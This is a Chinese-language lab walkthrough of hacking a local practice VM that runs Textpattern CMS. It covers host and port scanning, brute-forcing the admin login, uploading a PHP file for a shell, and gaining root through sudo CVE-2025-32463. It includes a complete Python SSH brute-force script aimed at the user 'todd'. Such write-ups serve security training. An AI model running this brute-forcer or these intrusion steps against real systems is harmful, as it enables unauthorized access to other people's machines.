为什么全世界的恋 我都失一遍

为所有的悲剧 当特约演员

我伤得断肠 我哭的夸张

像一套港产片

信息收集

主机发现

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[/home/kali]
└─# arp-scan -I eth1 192.168.56.0/24
Interface: eth1, type: EN10MB, MAC: 00:0c:29:34:da:f5, IPv4: 192.168.56.103
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:04       (Unknown: locally administered)
192.168.56.100  08:00:27:7a:69:65       (Unknown)
192.168.56.147  08:00:27:1f:4e:4b       (Unknown)

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.908 seconds (134.17 hosts/sec). 3 responded

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[/home/kali]
└─# nmap -p- 192.168.56.147
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-15 08:40 EDT
Nmap scan report for 192.168.56.147
Host is up (0.00079s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:1F:4E:4B (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 20.07 seconds

这里我改了一下host

image-20250715204155481

image-20250715204207209

网站是由Textpattern CMS搭建的

image-20250715204307804

去看了一下这个CMS已经披露的漏洞, 都是需要有认证才能拿到shell

image-20250715204447103

然后我找了一下这个网站的后台地址

image-20250715204511552

不过用户名怎么输入,登录失败网站只有下面一种报错

image-20250715204622450

其实对于这种只有一种报错信息的 我是挺不愿意尝试去爆破的。 因为我无法得知我所要爆破的用户名是否正确

我在Arricles页面看到一个用户名

image-20250715204746501

其实当时也想过在忘记密码这个页面来验证username是否有效

但是不论是什么username他都会显示emai发送成功

image-20250715205219162

当时也怀疑过这个是一个账户名

然后我就去找了一个官方的演示站点

登录上去看了一下

image-20250715205140976

image-20250715205429532

显然这里显示的不是username

然后就无奈试了试爆破admin

嘿,还真爆出来了

382515fee378bb4935f51776baf35291

然后我在插件处找了一个上传的地方

image-20250715205602946

上传了一个php文件上去

image-20250715205718574

文件内容

image-20250715205727605

然后你就会发现 网站到处都是phpinfo();

image-20250715205755424

image-20250715205817417

然后我就弹了一个shell

提取

找了一下有s权限的文件

image-20250715210015703

看到有两个sudo, 想着其中一个肯定不对劲

但是不知道怎么利用

然后还有一个todd这个普通用户

就想着先提权到 todd然后再看下一步

用hydra去爆破todd密码 会报错

用python写小脚本 也不能频繁爆破

貌似是做了防爆破措施

image-20250715210339118

这里放一下python脚本的内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
import paramiko

host = "192.168.56.147"
port = 22
username = "todd"
password_file = "/usr/share/wordlists/rockyou.txt"  # 你的密码字典路径

def try_ssh(password):
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh.connect(hostname=host, port=port, username=username, password=password, timeout=5)
        print(f"[+] 登录成功!密码是: {password}")
        ssh.close()
        return True
    except paramiko.AuthenticationException:
        print(f"[-] 密码错误: {password}")
        return False
    except Exception as e:
        print(f"[-] 连接错误: {e}")
        return False

def main():
    with open(password_file, "r", errors="ignore") as f:
        for line in f:
            pwd = line.strip()
            if try_ssh(pwd):
                print("[*] 爆破结束。")
                break

if __name__ == "__main__":
    main()

然后实在不行了

看了一下两个sudo的文件的版文 去试试CVE

其实我这时候对用CVE进行提权没报很大希望

然后确实/usr/bin/sudo是存在CVE-2025-32463这个不久前爆出的漏洞的

然后下载了一个exp改了一下exp中sudo的路径

image-20250715210656948

然后成功拿到root了

image-20250715210725597